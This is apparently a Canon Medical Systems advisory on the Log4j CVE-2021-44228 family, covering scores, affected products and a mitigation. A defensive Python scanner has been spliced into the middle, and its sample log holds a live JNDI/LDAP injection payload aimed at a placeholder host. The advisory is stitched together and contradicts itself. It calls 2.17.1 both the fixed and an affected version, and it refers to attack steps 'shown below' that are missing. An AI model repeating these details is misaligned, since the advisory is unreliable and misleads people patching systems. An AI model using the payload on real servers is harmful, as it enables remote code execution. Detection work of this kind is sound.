
Apache Log4j Vulnerability

Canon Medical Systems Security Advisory

Overview:
Security vulnerabilities have been announced in Apache Log4j, a Java-based logging library provided by The Apache Software Foundation. On a server running Apache Log4j, a remote attacker could execute arbitrary code by sending specially crafted data that exploits these vulnerabilities.

Vulnerability Overview:
Log4j provides a Lookup function that evaluates certain substrings of a logged message as variables. Among the Lookups, the JNDI Lookup was found to retrieve Java class information from an external URL or internal path contained in the logged message, deserialize it and execute it (CWE-20, CVE-2021-44228). This allows a remote attacker who can get a specially crafted string written into the vulnerable system's log to have arbitrary Java code executed by the system. CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 were also reported after CVE-2021-44228. All of these vulnerabilities are fixed in the latest Log4j version (2.17.1).
The Apache Software Foundation has published the following information:

REF: https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
REF: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

- Base CVSS Score:
  CVE-2021-44228 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
  CVE-2021-45046 9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
  CVE-2021-45105 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
  CVE-2021-44832 6.6 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
- Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.17.1
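The trigger described in the vulnerability overview is a lookup expression that ends up in a log line, so one defender-side check is to scan existing logs for Log4j lookup syntax. The scanner below is an added example, not part of this advisory or of any Canon Medical product; the log lines it scans are constructed samples, and 203.0.113.0/24 is a documentation-only address range.

```python
from typing import Dict, List, Tuple

# Constructed sample log lines (not from the advisory). Line 2 carries a
# JNDI lookup of the kind CVE-2021-44228 evaluates; line 3 carries a nested
# lookup built only from benign prefixes to show the "review" path.
SAMPLE_LOG = [
    '10.0.0.7 - - [13/Dec/2021:08:15:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:08:15:04 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    'app: report generated for ${date:${env:REPORT_DATE_FMT}}',
    'app: user lookup ${env:HOME} finished',
]


def extract_lookups(text: str) -> List[Dict]:
    """Return every ${...} lookup in text with its prefix and nesting depth.

    A stack-based scan is used instead of a flat regex so that lookups
    nested inside other lookups are reported individually."""
    results: List[Dict] = []
    stack: List[int] = []  # start offsets of currently open "${"
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            body = text[start + 2:i]
            prefix = body.split(":", 1)[0].strip().lower()  # "jndi", "env", "date", ...
            results.append({"expr": text[start:i + 1], "prefix": prefix, "depth": len(stack)})
        i += 1
    return results


def classify_line(line: str) -> str:
    """'alert'  : a jndi lookup is present (the CVE-2021-44228 trigger)
       'review' : nested lookups are present; they defeat naive string matching
                  and should be inspected by an analyst
       'clean'  : no lookup, or only flat non-JNDI lookups"""
    lookups = extract_lookups(line)
    if any(item["prefix"] == "jndi" for item in lookups):
        return "alert"
    if any(item["depth"] > 0 for item in lookups):
        return "review"
    return "clean"


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, verdict, line) for every line that is not clean."""
    verdicts = [(n, classify_line(line), line) for n, line in enumerate(lines, 1)]
    return [entry for entry in verdicts if entry[1] != "clean"]
```

Run `scan()` over a real access or application log and review every "alert" and "review" hit; a clean result does not prove the library itself is patched, so the version check still applies.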

Possible Affected Canon Medical Systems Products:
The following Canon Medical Systems Corporation products do not use Apache Log4j:

  • CT Medical Imaging Products
  • MR Medical Imaging Products
  • UL Medical Imaging Products
  • XR Medical Imaging Products
  • NM Medical Imaging Products
  • Eye-Care Products
  • Canon DR Products (CXDI_NE) such as Omnera, FlexPro, Soltus
  • VL Infinix-i and Alphenix DFP
  • VL Infinix-i Angio Workstation (AWS)

Canon Medical Products that are affected:

  • Vitrea Advanced 7.x
  • VL Alphenix Angio Workstation (AWS)
Mitigations for affected systems:

  • For the VL Alphenix Angio Workstation (AWS), it is confirmed that LDAP port 389 is closed on all AWS versions from 8.0 to 9.3. Because LDAP communication is blocked, Step 1 of the attack (shown below) fails, so there is no impact on the Alphenix Angio Workstation (AWS).

Source: JPCERT Coordination Center
"Observation of Attacks Targeting Apache Log4j2 RCE Vulnerability (CVE-2021-44228)"
https://blogs.jpcert.or.jp/en/2021/12/log4j-cve-2021-44228.html